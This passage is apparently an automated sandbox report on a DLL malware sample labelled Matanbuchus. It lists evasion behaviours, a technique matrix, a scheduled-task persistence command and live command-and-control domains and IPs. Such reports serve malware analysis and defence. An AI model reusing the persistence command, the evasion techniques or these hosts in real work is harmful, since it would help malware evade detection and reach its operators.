                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winrnr.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                Source: file.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                Source: Yara matchFile source: file.dll, type: SAMPLE
                Source: Yara matchFile source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D15C6 push ecx; ret 14_2_7F3D15D9
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE15C6 push ecx; ret 18_2_7EDE15D9
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE15C6 push ecx; ret 34_2_7EEE15D9
                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\user-PC\user-PC.ocx

                Hooking and other Techniques for Hiding and Protection

                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 54801
                Source: unknownNetwork traffic detected: HTTP traffic on port 54801 -> 49994
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDCC7B0 GetSystemDefaultLangID,IsIconic,SetLastError,GetCommandLineW,lstrlenA,GetSystemDefaultLCID,18_2_7EDCC7B0
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,14_2_7F3AB430
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,18_2_7EDBB430
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetAdaptersInfo,34_2_7EEBB430
                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocx
                Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.5 %
                Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 5.5 %
                Source: C:\Windows\SysWOW64\rundll32.exe TID: 8160Thread sleep time: -130000s >= -30000s
                Source: C:\Windows\SysWOW64\rundll32.exe TID: 8164Thread sleep time: -130000s >= -30000s
                Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2172Thread sleep time: -130000s >= -30000s
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3AAF80 GetSystemInfo,14_2_7F3AAF80
                Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000
                Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000
                Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 130000
                Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3E6967 IsDebuggerPresent,OutputDebugStringW,14_2_7F3E6967
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE66D10 mov eax, dword ptr fs:[00000030h]34_2_7EE66D10
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEDFA90 mov eax, dword ptr fs:[00000030h]34_2_7EEDFA90
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE87A60 mov edx, dword ptr fs:[00000030h]34_2_7EE87A60
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE86B80 mov edx, dword ptr fs:[00000030h]34_2_7EE86B80
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEA4B90 mov ecx, dword ptr fs:[00000030h]34_2_7EEA4B90
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE66B00 mov edx, dword ptr fs:[00000030h]34_2_7EE66B00
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE948E0 mov ecx, dword ptr fs:[00000030h]34_2_7EE948E0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE83992 mov edx, dword ptr fs:[00000030h]34_2_7EE83992
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]34_2_7EE64664
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]34_2_7EE64664
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64664 mov edx, dword ptr fs:[00000030h]34_2_7EE64664
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE79790 mov edx, dword ptr fs:[00000030h]34_2_7EE79790
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]34_2_7EE79790
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]34_2_7EE79790
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]34_2_7EEBA730
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBA730 mov eax, dword ptr fs:[00000030h]34_2_7EEBA730
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]34_2_7EEBA730
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov edx, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]34_2_7EEBD5B0
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8757D mov eax, dword ptr fs:[00000030h]34_2_7EE8757D
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBE570 mov eax, dword ptr fs:[00000030h]34_2_7EEBE570
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE8C230 mov eax, dword ptr fs:[00000030h]34_2_7EE8C230
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBE380 mov eax, dword ptr fs:[00000030h]34_2_7EEBE380
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBC340 mov eax, dword ptr fs:[00000030h]34_2_7EEBC340
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov ecx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov eax, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]34_2_7EE651EF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE67160 mov edx, dword ptr fs:[00000030h]34_2_7EE67160
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64174 mov edx, dword ptr fs:[00000030h]34_2_7EE64174
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64174 mov ecx, dword ptr fs:[00000030h]34_2_7EE64174
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEBB130 mov eax, dword ptr fs:[00000030h]34_2_7EEBB130
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]34_2_7EE64110
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F35B5AE CreateMutexA,GetProcessHeap,lstrlenW,GetFocus,GetMenu,GetSubMenu,GetModuleHandleA,GetOEMCP,IsWow64Message,SetLastError,IsValidCodePage,GetModuleHandleA,lstrlenA,IsValidCodePage,GetLastError,lstrlenA,lstrlenW,IsValidCodePage,IsValidCodePage,GetFocus,GetSystemMenu,IsValidCodePage,CloseHandle,GetFocus,IsWindow,ArrangeIconicWindows,14_2_7F35B5AE
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_6D0AAAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_6D0AAAFD
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_7F3D1B15
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_7F3D18C7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_7F3D5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_7F3D5753
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_7EDE1B15
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_7EDE18C7
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_7EDE5753
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_6B86AAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_6B86AAFD
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_7EEE1B15
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_7EEE18C7
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 34_2_7EEE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_7EEE5753

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.109.85.27 443
                Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 193.109.85.31 54801
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE167C cpuid 18_2_7EDE167C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_7F3EAF2B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3EAB24
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3EAA3E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3EAA89
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,14_2_7F3E485C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,14_2_7F3EA79C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,14_2_7F3E42DF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_7F3EB100
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_7EDFAF2B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDFAA89
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDFAA3E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDFAB24
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,18_2_7EDF485C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,18_2_7EDFA79C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,18_2_7EDF42DF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_7EDFB100
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,34_2_7EEFAF2B
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEFAA89
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEFAA3E
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEFAB24
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,34_2_7EEF485C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,34_2_7EEFA79C
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,34_2_7EEF42DF
                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,34_2_7EEFB100
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7EDE19E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,18_2_7EDE19E4
                Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                Windows Management Instrumentation
                1
                DLL Side-Loading
                111
                Process Injection
                1
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                LSASS Memory15
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media11
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
                Process Injection
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive2
                Ingress Tool Transfer
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information
                LSA Secrets1
                System Network Configuration Discovery
                SSHKeylogging4
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Rundll32
                Cached Domain Credentials25
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                [Behavior graph: ID 1526602, Sample: file.dll, Startdate: 06/10/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label | Link
                file.dll | 17% | Virustotal | | Browse
                file.dll | 11% | ReversingLabs | |
                Source | Detection | Scanner | Label | Link
                C:\Users\user\8f08\user-PC\user-PC.ocx | 11% | ReversingLabs | |
                C:\Users\user\8f08\user-PC\user-PC.ocx | 17% | Virustotal | | Browse
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                semurox.com | 3% | Virustotal | | Browse
                vilodeqa.com | 3% | Virustotal | | Browse
                Source | Detection | Scanner | Label | Link
                https://semurox.com/account.aspx | 8% | Virustotal | | Browse
                https://vilodeqa.com/detalis.aspx | 0% | Virustotal | | Browse
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                semurox.com | 193.109.85.27 | true | true | | unknown
                vilodeqa.com | 193.109.85.31 | true | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                https://vilodeqa.com/detalis.aspx | true | | unknown
                https://semurox.com/account.aspx | true | | unknown
                http://vilodeqa.com/blueoceansite/templates/docs/index.php | true | | unknown
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  193.109.85.27 | semurox.com | Russian Federation | | 9009 | M247GB | true
                  193.109.85.31 | vilodeqa.com | Russian Federation | | 9009 | M247GB | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1526602
                  Start date and time:2024-10-06 13:24:09 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:40
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.dll
                  Detection:MAL
                  Classification:mal100.troj.evad.winDLL@44/7@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .dll
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                  • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  13:25:15Task SchedulerRun new task: {9728E56C-DF24-4F92-ACB5-E96DE04CE0D6} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.109.85.27file.dllGet hashmaliciousMatanbuchusBrowse
                    193.109.85.31file.dllGet hashmaliciousMatanbuchusBrowse
                    • vilodeqa.com/blueoceansite/templates/docs/index.php
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    vilodeqa.comfile.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.31
                    semurox.comfile.dllGet hashmaliciousMatanbuchusBrowse
                    • 193.109.85.27
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    M247GBBooking_0106.exeGet hashmaliciousAgentTeslaBrowse
                    • 172.86.66.70
                    DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                    • 185.236.203.101
                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                    • 82.102.27.163
                    file.dllGet hashmaliciousMatanbuchusBrowse
